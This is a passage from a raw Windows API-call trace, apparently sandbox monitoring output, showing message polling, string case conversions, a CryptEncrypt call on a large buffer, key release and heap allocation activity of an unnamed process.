lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.330] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.330] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.330] CharLowerBuffW (in: lpsz="byte[99192]", cchLength=0xb | out: lpsz="byte[99192]") returned 0xb [0256.330] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.331] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.331] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.331] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.331] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.331] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.331] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.331] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.332] CryptEncrypt (in: hKey=0xaa5960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34e2950*, pdwDataLen=0x8bef68*=0x18374, dwBufLen=0x18378 | out: pbData=0x34e2950*, pdwDataLen=0x8bef68*=0x18378) returned 1 [0256.333] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.333] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.333] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.333] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.333] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.333] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.333] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.333] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.334] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.334] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.334] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.334] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.334] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.334] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.334] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.334] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.334] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.334] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.334] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.334] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.334] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.334] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.334] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.334] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.334] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.335] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.335] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.338] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.338] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.338] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.341] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.341] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.342] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0256.342] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.342] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0256.342] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.342] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.342] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.342] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.342] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.342] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.342] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.342] CryptDestroyKey (hKey=0xaa5960) returned 1 [0256.342] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.342] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.343] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.343] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.343] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.343] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.343] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.343] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.343] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.343] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.343] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.343] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.343] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.343] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.344] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.344] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.344] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.344] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.344] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.344] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.344] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.344] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.344] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.344] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.344] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.344] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.345] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.345] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.345] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.345] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.345] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.345] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.345] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.345] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.345] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.345] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.345] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.345] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.345] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.345] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.346] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.346] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.346] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.346] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.346] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.346] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.346] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.346] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.346] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.346] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0256.346] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.346] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.347] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.347] CryptReleaseContext (hProv=0xad2698, dwFlags=0x0) returned 1 [0256.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0256.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0256.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0256.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0256.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.349] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0256.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0256.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0256.349] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0256.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0256.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.349] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0256.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0256.350] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0256.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0256.350] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.350] 